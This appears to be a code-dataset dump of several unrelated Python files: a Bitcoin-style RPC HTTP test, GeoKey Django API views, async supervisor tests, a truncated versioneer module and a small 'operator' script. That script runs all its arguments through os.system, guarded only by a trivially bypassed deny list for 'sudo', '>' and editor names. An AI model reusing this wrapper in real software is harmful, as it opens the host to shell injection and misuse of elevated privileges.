filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_12273 | #!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the RPC HTTP basics."""
from test_framework.test_framework import MonicoinTestFramework
from test_framework.util import assert_equal, str_to_b64str
import http.client
import urllib.parse
class HTTPBasicsTest (MonicoinTestFramework):
def set_test_params(self):
self.num_nodes = 3
self.supports_cli = False
def setup_network(self):
self.setup_nodes()
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1 #must also response with a correct json-rpc message
assert conn.sock is not None #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is None #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #connection must be closed because monicoind should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
the-stack_0_12275 | """Views for observations of categories."""
from django.core.exceptions import PermissionDenied
from django.views.decorators.gzip import gzip_page
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from geokey.core.decorators import handle_exceptions_for_ajax
from geokey.users.models import User
from geokey.projects.models import Project
from geokey.core.exceptions import InputError
from ..renderers.geojson import GeoJsonRenderer
from ..parsers.geojson import GeoJsonParser
from .base import SingleAllContribution
from ..serializers import ContributionSerializer
class GZipView(object):
def dispatch(self, request, *args, **kwargs):
if not hasattr(self, 'META'):
setattr(self, 'META', {})
if request.META.get('HTTP_ACCEPT_ENCODING'):
self.META['HTTP_ACCEPT_ENCODING'] = request.META['HTTP_ACCEPT_ENCODING']
return super(GZipView, self).dispatch(request, *args, **kwargs)
class GeoJsonView(APIView):
renderer_classes = (GeoJsonRenderer,)
parser_classes = (GeoJsonParser,)
class ProjectObservations(GZipView, GeoJsonView):
"""
Public API endpoint to add new contributions to a project
/api/projects/:project_id/contributions
"""
@handle_exceptions_for_ajax
def post(self, request, project_id):
"""
Adds a new contribution to a project
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the data base
Returns
-------
rest_framework.response.Respone
Contains the serialised contribution
"""
user = request.user
if user.is_anonymous():
user = User.objects.get(display_name='AnonymousUser')
data = request.data
project = Project.objects.as_contributor(request.user, project_id)
if (not data.get('meta').get('status') == 'draft' and
project.can_moderate(user)):
data['meta']['status'] = 'active'
serializer = ContributionSerializer(
data=data, context={'user': user, 'project': project}
)
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
@gzip_page
@handle_exceptions_for_ajax
def get(self, request, project_id):
"""
Handle GET request.
Return a list of all contributions of the project accessible to the
user.
Parameters
----------
request : rest_framework.request.Request
Represents the request.
project_id : int
Identifies the project in the database.
Returns
-------
rest_framework.response.Respone
Contains the serialized contributions.
"""
project = Project.objects.get_single(request.user, project_id)
try:
contributions = project.get_all_contributions(
request.user,
search=request.GET.get('search'),
subset=request.GET.get('subset'),
bbox=request.GET.get('bbox')
).select_related('location', 'creator', 'updator', 'category')
except InputError as e:
return Response(e, status=status.HTTP_406_NOT_ACCEPTABLE)
serializer = ContributionSerializer(
contributions,
many=True,
context={
'user': request.user,
'project': project,
'search': request.GET.get('search'),
'bbox': request.GET.get('bbox')
}
)
return Response(serializer.data, status=status.HTTP_200_OK)
# ############################################################################
#
# SINGLE CONTRIBUTION
#
# ############################################################################
class SingleContributionAPIView(GeoJsonView):
"""
Abstract APIView for handling requests to single observations
"""
def get_and_respond(self, request, observation):
"""
Returns a single contributions
Parameters
----------
request : rest_framework.request.Request
Represents the request
observation : geokey.contributions.models.Observation
Observation to be returned
Returns
-------
rest_framework.response.Respone
Contains the serialised observation
"""
serializer = ContributionSerializer(
observation,
context={'user': request.user, 'project': observation.project}
)
return Response(serializer.data, status=status.HTTP_200_OK)
def update_and_respond(self, request, observation):
"""
Updates and returns a single contributions
Parameters
----------
request : rest_framework.request.Request
Represents the request
observation : geokey.contributions.models.Observation
Observation to be returned
Returns
-------
rest_framework.response.Respone
Contains the updated serialised observation
"""
data = request.data
user = request.user
if user.is_anonymous():
user = User.objects.get(display_name='AnonymousUser')
new_status = None
if data.get('meta') is not None:
new_status = data.get('meta').get('status')
user_can_moderate = observation.project.can_moderate(user)
user_is_owner = (observation.creator == user)
under_review = observation.comments.filter(
review_status='open').exists()
if (new_status is not None and new_status != observation.status):
if not (
(new_status == 'pending' and
(user_is_owner or user_can_moderate)) or
(new_status == 'active' and
observation.status == 'draft' and user_is_owner) or
(new_status == 'active' and
observation.status == 'pending' and user_can_moderate)):
raise PermissionDenied('You are not allowed to update the '
'status of the contribution from "%s" '
'to "%s"' % (
observation.status,
new_status
))
elif not (user_is_owner or user_can_moderate):
raise PermissionDenied('You are not allowed to update the'
'contribution')
if new_status == 'active' and under_review:
data['meta']['status'] = 'review'
if ((new_status == 'active' and observation.status == 'draft') and
not user_can_moderate):
default_status = observation.category.default_status
data['meta']['status'] = default_status
serializer = ContributionSerializer(
observation,
data=data,
context={'user': user, 'project': observation.project}
)
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
def delete_and_respond(self, request, observation):
"""
Deletes a single observation
Parameters
----------
request : rest_framework.request.Request
Represents the request
observation : geokey.contributions.models.Observation
Observation to be deleted
Returns
-------
rest_framework.response.Respone
Empty response indicating successful delete
"""
if (observation.creator == request.user or
observation.project.can_moderate(request.user)):
observation.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
raise PermissionDenied('You are not allowed to delete this'
'contribution')
class SingleAllContributionAPIView(
SingleAllContribution, SingleContributionAPIView):
"""
Public API endpoint for updating a single observation in a project
/api/projects/:project_id/observations/:observation_id
"""
@handle_exceptions_for_ajax
def get(self, request, project_id, observation_id):
"""
Returns a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the data base
observation_id : int
identifies the observation in the data base
Returns
-------
rest_framework.response.Respone
Contains the serialised observation
"""
contribution = self.get_contribution(
request.user,
project_id,
observation_id
)
return self.get_and_respond(request, contribution)
@handle_exceptions_for_ajax
def patch(self, request, project_id, observation_id):
"""
Updates and returns a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the data base
observation_id : int
identifies the observation in the data base
Returns
-------
rest_framework.response.Respone
Contains the updated serialised observation
"""
contribution = self.get_contribution(
request.user,
project_id,
observation_id
)
return self.update_and_respond(request, contribution)
@handle_exceptions_for_ajax
def delete(self, request, project_id, observation_id):
"""
Deletes a single contribution
Parameters
----------
request : rest_framework.request.Request
Represents the request
project_id : int
identifies the project in the data base
observation_id : int
identifies the observation in the data base
Returns
-------
rest_framework.response.Respone
Empty response indicating successful delete
"""
contribution = self.get_contribution(
request.user,
project_id,
observation_id
)
return self.delete_and_respond(request, contribution)
|
the-stack_0_12276 | #!/usr/local/bin/python
from os import system
from sys import argv
cl = argv[1]
liste = open('/usr/local/share/operator/editor').read()
if "sudo" in argv[1:]:
print("Can't use sudo with operator")
elif ">" in argv[1:]:
print("Can't use > with operator")
elif cl in liste:
print(("Can't use %s with operator!" % argv[1]))
else:
cmd = ''
for line in argv[1:]:
cmd += line + " "
system(cmd) |
the-stack_0_12278 | import unittest
import unittest.mock
import re
from g1.asyncs import agents
from g1.asyncs import kernels
from g1.asyncs.bases import locks
from g1.asyncs.bases import queues
from g1.asyncs.bases import tasks
from g1.asyncs.bases import timers
class SuperviseAgentsTest(unittest.TestCase):
def setUp(self):
super().setUp()
self.main_task = None
self.agent_queue = tasks.CompletionQueue()
self.graceful_exit = locks.Event()
self.signal_queue = queues.Queue()
mock = unittest.mock.patch(agents.__name__ + '.signals').start()
mock.SignalSource().__enter__().get = self.signal_queue.get
self._assert_logs = self.assertLogs(agents.__name__, level='DEBUG')
self.cm = self._assert_logs.__enter__()
def tearDown(self):
unittest.mock.patch.stopall()
self._assert_logs.__exit__(None, None, None)
super().tearDown()
def assert_state(self, closed, queue_size, graceful_exit, log_patterns):
self.assertEqual(self.agent_queue.is_closed(), closed)
self.assertEqual(len(self.agent_queue), queue_size)
self.assertEqual(self.graceful_exit.is_set(), graceful_exit)
message = 'expect patterns %r in %r' % (log_patterns, self.cm.output)
if len(self.cm.output) != len(log_patterns):
self.fail(message)
for log_line, log_pattern in zip(self.cm.output, log_patterns):
if not re.search(log_pattern, log_line):
self.fail(message)
def run_supervisor(self):
self.main_task = tasks.spawn(
agents.supervise_agents(self.agent_queue, self.graceful_exit, 5)
)
kernels.run(timeout=0.01)
@kernels.with_kernel
def test_graceful_exit_by_user(self):
self.graceful_exit.set()
self.run_supervisor()
self.assert_state(True, 0, True, [r'graceful exit: requested by user'])
self.assertIsNone(self.main_task.get_result_nonblocking())
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_signal(self):
self.signal_queue.put_nonblocking(1)
self.run_supervisor()
self.assert_state(True, 0, True, [r'graceful exit: receive signal: 1'])
self.assertIsNone(self.main_task.get_result_nonblocking())
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_repeated_signals(self):
sleep_task = self.agent_queue.spawn(timers.sleep(99))
self.assert_state(False, 1, False, [])
self.signal_queue.put_nonblocking(1)
with self.assertRaises(kernels.KernelTimeout):
self.run_supervisor()
self.assert_state(True, 1, True, [r'graceful exit: receive signal: 1'])
self.signal_queue.put_nonblocking(2)
kernels.run(timeout=1)
self.assert_state(True, 0, True, [r'graceful exit: receive signal: 1'])
with self.assertRaisesRegex(
agents.SupervisorError,
r'receive signal during graceful exit: 2',
):
self.main_task.get_result_nonblocking()
with self.assertRaises(tasks.Cancelled):
sleep_task.get_result_nonblocking()
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_agent_exit(self):
noop_task = self.agent_queue.spawn(noop)
self.assert_state(False, 1, False, [])
self.run_supervisor()
self.assert_state(
True, 0, True, [r'no op', r'graceful exit: agent exit: ']
)
self.assertIsNone(noop_task.get_result_nonblocking())
self.assertFalse(tasks.get_all_tasks())
@kernels.with_kernel
def test_agent_error(self):
raises_task = self.agent_queue.spawn(raises(ValueError('some error')))
self.assert_state(False, 1, False, [])
self.run_supervisor()
self.assert_state(True, 0, False, [])
with self.assertRaisesRegex(
agents.SupervisorError,
r'agent err out: ',
):
self.main_task.get_result_nonblocking()
with self.assertRaisesRegex(ValueError, r'some error'):
raises_task.get_result_nonblocking()
self.assertFalse(tasks.get_all_tasks())
# Make self._assert_logs.__exit__ happy.
agents.LOG.debug('dummy')
@kernels.with_kernel
def test_grace_period_exceeded(self):
self.graceful_exit.set()
sleep_task = self.agent_queue.spawn(timers.sleep(99))
self.assert_state(False, 1, True, [])
self.main_task = tasks.spawn(
agents.supervise_agents(self.agent_queue, self.graceful_exit, 0)
)
kernels.run(timeout=0.01)
self.assert_state(True, 0, True, [r'graceful exit: requested by user'])
with self.assertRaisesRegex(
agents.SupervisorError,
r'grace period exceeded',
):
self.main_task.get_result_nonblocking()
with self.assertRaises(tasks.Cancelled):
sleep_task.get_result_nonblocking()
self.assertFalse(tasks.get_all_tasks())
async def noop():
agents.LOG.debug('no op')
async def raises(exc):
raise exc
if __name__ == '__main__':
unittest.main()
|
the-stack_0_12279 | # This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.21 (https://github.com/python-versioneer/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
from typing import Callable, Dict
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = ""
cfg.versionfile_source = "prefect_email/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY: Dict[str, str] = {}
HANDLERS: Dict[str, Dict[str, Callable]] = {}
def register_vcs_handler(vcs, method): # decorator
"""Create decorator to mark a method as the handler of a VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
process = None
for command in commands:
try:
dispcmd = str([command] + args)
# remember shell=False, so use git.cmd on windows, not just git
process = subprocess.Popen(
[command] + args,
cwd=cwd,
env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr else None),
)
break
except OSError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = process.communicate()[0].strip().decode()
if process.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, process.returncode
return stdout, process.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for _ in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {
"version": dirname[len(parentdir_prefix) :],
"full-revisionid": None,
"dirty": False,
"error": None,
"date": None,
}
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print(
"Tried directories %s but none started with prefix %s"
% (str(rootdirs), parentdir_prefix)
)
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
with open(versionfile_abs, "r") as fobj:
for line in fobj:
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
except OSError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if "refnames" not in keywords:
raise NotThisMethod("Short version file found")
date = keywords.get("date")
if date is not None:
# Use only the last line. Previous lines may contain GPG signature
# information.
date = date.splitlines()[-1]
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = {r.strip() for r in refnames.strip("()").split(",")}
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = {r[len(TAG) :] for r in refs if r.startswith(TAG)}
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = {r for r in refs if re.search(r"\d", r)}
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix) :]
# Filter out refs that exactly match prefix or that don't start
# with a number once the prefix is stripped (mostly a concern
# when prefix is '')
if not re.match(r"\d", r):
continue
if verbose:
print("picking %s" % r)
return {
"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": None,
"date": date,
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {
"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": "no suitable tags",
"date": None,
}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, runner=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
TAG_PREFIX_REGEX = "*"
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
TAG_PREFIX_REGEX = r"\*"
_, rc = runner(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = runner(
GITS,
[
"describe",
"--tags",
"--dirty",
"--always",
"--long",
"--match",
"%s%s" % (tag_prefix, TAG_PREFIX_REGEX),
],
cwd=root,
)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = runner(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
branch_name, rc = runner(GITS, ["rev-parse", "--abbrev-ref", "HEAD"], cwd=root)
# --abbrev-ref was added in git-1.6.3
if rc != 0 or branch_name is None:
raise NotThisMethod("'git rev-parse --abbrev-ref' returned error")
branch_name = branch_name.strip()
if branch_name == "HEAD":
# If we aren't exactly on a branch, pick a branch which represents
# the current commit. If all else fails, we are on a branchless
# commit.
branches, rc = runner(GITS, ["branch", "--contains"], cwd=root)
# --contains was added in git-1.5.4
if rc != 0 or branches is None:
raise NotThisMethod("'git branch --contains' returned error")
branches = branches.split("\n")
# Remove the first line if we're running detached
if "(" in branches[0]:
branches.pop(0)
# Strip off the leading "* " from the list of branches.
branches = [branch[2:] for branch in branches]
if "master" in branches:
branch_name = "master"
elif not branches:
branch_name = None
else:
# Pick the first branch that is returned. Good or bad.
branch_name = branches[0]
pieces["branch"] = branch_name
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[: git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
if not mo:
# unparsable. Maybe git-describe is misbehaving?
pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
full_tag,
tag_prefix,
)
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix) :]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = runner(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = runner(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[0].strip()
# Use only the last line. Previous lines may contain GPG signature
# information.
date = date.splitlines()[-1]
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_branch(pieces):
"""TAG[[.dev0]+DISTANCE.gHEX[.dirty]] .
The ".dev0" means not master branch. Note that .dev0 sorts backwards
(a feature branch will appear "older" than the master branch).
Exceptions:
1: no tags. 0[.dev0]+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0"
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += "+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def pep440_split_post(ver):
"""Split pep440 version string at the post-release segment.
Returns the release segments before the post-release and the
post-release version number (or -1 if no post-release segment is present).
"""
vc = str.split(ver, ".post")
return vc[0], int(vc[1] or 0) if len(vc) == 2 else None
def render_pep440_pre(pieces):
"""TAG[.postN.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post0.devDISTANCE
"""
if pieces["closest-tag"]:
if pieces["distance"]:
# update the post release segment
tag_version, post_version = pep440_split_post(pieces["closest-tag"])
rendered = tag_version
if post_version is not None:
rendered += ".post%d.dev%d" % (post_version + 1, pieces["distance"])
else:
rendered += ".post0.dev%d" % (pieces["distance"])
else:
# no commits, use the tag as the version
rendered = pieces["closest-tag"]
else:
# exception #1
rendered = "0.post0.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_post_branch(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX[.dirty]] .
The ".dev0" means not master branch.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]+gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["branch"] != "master":
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {
"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None,
}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-branch":
rendered = render_pep440_branch(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-post-branch":
rendered = render_pep440_post_branch(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {
"version": rendered,
"full-revisionid": pieces["long"],
"dirty": pieces["dirty"],
"error": None,
"date": pieces.get("date"),
}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
